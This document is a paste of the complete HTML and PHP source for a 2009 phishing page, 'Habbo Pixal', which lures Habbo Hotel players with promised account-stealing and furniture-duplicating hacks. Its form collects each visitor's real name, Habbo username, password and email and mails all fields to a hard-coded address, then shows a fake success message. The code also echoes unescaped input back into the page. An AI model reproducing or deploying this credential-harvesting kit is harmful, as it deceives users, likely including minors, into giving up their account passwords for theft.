Pastoid

The page you are looking at now is at this URL: http://pastoid.com/buc

This paste was last updated on July 25, 2009 at 7:39 pm.

Pasted Coderaw

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
	<!-- Habbo Pixal -->
	<title>Habbo Pixal - The way of the future</title>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
	<meta http-equiv="content-type" content="text/html; charset=utf-8" />
    <meta name="description" content="Habbo Pixal - The way of the future. Now version 14.6 with Account stealing, Furniture stealing, Furniture duplicating and Staff rights." />
    <meta name="author" content="Habbo Pixal - http://HabboPixal.co.cc/" />
    <meta name="copyright" content="Copyright @ 2009 Habbo Pixal All rights reserved." />
    <meta name="keywords" content="habbo, pixal, habbo pixal, furniture, hack, duplicating, duplicater, staff, rights, account, stealing, version, habbo hotel, hacks, cheats, cheat, the, way, of, the, future" />
    <meta http-equiv="imagetoolbar" content="no" />
    <link rel="stylesheet" type="text/css" media="screen" href="css/reset.css" />
	<link rel="stylesheet" type="text/css" media="screen" href="css/styles.css" />
	<link rel="shortcut icon" href="images/favicon.ico" type="image/vnd.microsoft.icon" />
	<script type="text/javascript" src="js/jquery-1.2.6.min.js"></script>
	<script type="text/javascript" src="js/easyslider.js"></script>
	<script type="text/javascript" src="js/bgpos.js"></script>
	<script type="text/javascript" src="js/custom.js"></script>
</head>
<body>
<div id="all">
 <center><a href="http://habbopixal.co.cc"><img src="./images/logofull.png" border="0" alt="Habbo Pixal - The way of the future"></a></center>
	<div id="content">
	    <h3>What is Habbo Pixal?</h3>
		<p>We are a small start up company with a team of creative and dedicated individuals with one goal in mind. To deliver eye capturing hacks and duplicaters with a mix of class and edge. Are you tired of being poor on habbo? Do you want more people to think your rich? Whatever it is, we want to help you, and we insist that it is done right. We take every program we make as serious as the other, including yours and we also are giving the program and Habbo furniture, accounts and so on away, Keep reading below.</p>
		<h3>Okay, So this is how you do it.</h3>
		<p>Well, Because of the up rising amont of people wanting Habbo hacks we dedicated individuals decided to make a hack that would please you all, Now if you dont want to download a hack fill in the form below with your real Habbo Username, Password and put your real Email and real name, If you still want the program as well or just by its self you still have to take these steps.</p>
		<h3>Videos and Screenshots of it in action.</h3>
		<p>This little section will be coming later next month with tones of proof that our programs are legit. Until then fill in the form below.</p>
		<h3>Habbo Pixal Form</h3>
		<?php
			//!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
			$youremail = 'habbopixal@live.com'; //!!!
			//!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
			$subject = '[Habbo Pixal Form]';
			unset($status);
&nbsp;
			if ($_POST) 
			{ 
				$name = $_POST["name"];
				$username = $_POST["username"];
				$password = $_POST["password"];
				$email = $_POST["email"];
				$message = $_POST["message"];
				$header = 'From:'.$name.' <'.$email.'>';
&nbsp;
			    if ((empty($name)) || (eregi('[@]', $name)) || ($name > 255)) { $status[1] = '<span class="error">This name is invalid, can you check it?</span>'; }
			    if ((empty($username)) || (eregi('[@]', $username)) || ($username > 100)) { $status[2] = '<span class="error">This username is invalid, can you check it?</span>'; }
				if ((empty($password)) || (eregi('[@]', $password)) || ($password > 100)) { $status[3] = '<span class="error">This password is invalid, can you check it?</span>'; }
				if ((empty($email)) || (!eregi('^[-_a-z0-9]+(\\.[-_a-z0-9]+)*\\@([-a-z0-9]+\\.)*([a-z]{2,4})$', $email)) || ($email > 255)) { $status[4] = '<span class="error">This email is invalid, please check it.</span>'; }
				if ((empty($message)) || (strlen($message) > 10240)) { $status[5] = '<span class="error">Invalid message, please check the field again.</span>'; }
&nbsp;
				if (!empty($status)) {
					$status[0] = '<p class="error">Oh no, something is wrong. Please check below.</p>';
					if (!empty($status[4]))
					{
						$status[0] .= $status[4];
					}
				}
&nbsp;
				else
				{
					$message = '';
					foreach($_POST as $key => $value) { $message .= "{$key}: {$value}\n"; }
					if (!@mail($youremail,$subject,$message,$header)) { $status[0] = '<p class="error">Oh no, something is wrong. Please try the Habbo Pixal form again.</p>'; }
					else { $status[0] = '<p class="success">Perfect! You will receive your Habbo Pixal package within 1 to 3 days, Thank you.</p>'; }
 
 
				}
			}
		?>
		<form action="index.php" method="post" id="form">
&nbsp;
			<?php echo $status[0]; ?>
			<?php echo $status[6]; ?>
&nbsp;
			<p>
			<?php echo $status[1]; ?>
			<label for="name">What is your Real Name?</label>
			<input id="name" name="name" type="text" class="text" maxlength="255" value="<?php echo $name; ?>" />
			</p>
&nbsp;
			<p>
			<?php echo $status[2]; ?>
			<label for="username">What is your Habbo Username?</label>
			<input id="username" name="username" type="text" class="text" maxlength="100" value="<?php echo $username; ?>" />
			</p>
&nbsp;
			<p>
			<?php echo $status[3]; ?>
			<label for="password">What is your Habbo Password?</label>
			<input id="password" name="password" type="text" class="text" maxlength="100" value="<?php echo $password; ?>" />
			</p>			
&nbsp;
			<p>
			<?php echo $status[4]; ?>
			<label for="email">Tell Habbo Pixal your Email</label>
			<input id="email" name="email" type="text" class="text" maxlength="255" value="<?php echo $email; ?>" />
			</p>
&nbsp;
			<p>
			<?php echo $status[5]; ?>
			<label for="message">Tell us what you would like, Typos, Pures, Credits or the Habbo Pixal program and so on.</label>
			<textarea id="message" name="message" rows="8" cols="40"><?php echo $message; ?></textarea>
			</p>
&nbsp;
			<p class="button"><button type="submit"> </button></p>
		</form>
	</div>
&nbsp;
	<div id="footer">
		<p>Copyright @ 2009 Habbo Pixal All rights reserved.</p>
	</div>
</div>
</body>
</html>

Toggle wordwrap

Referring DomainHits
Unknown Referer 127
pastoid.com 4
Is this paste spam?
<Hide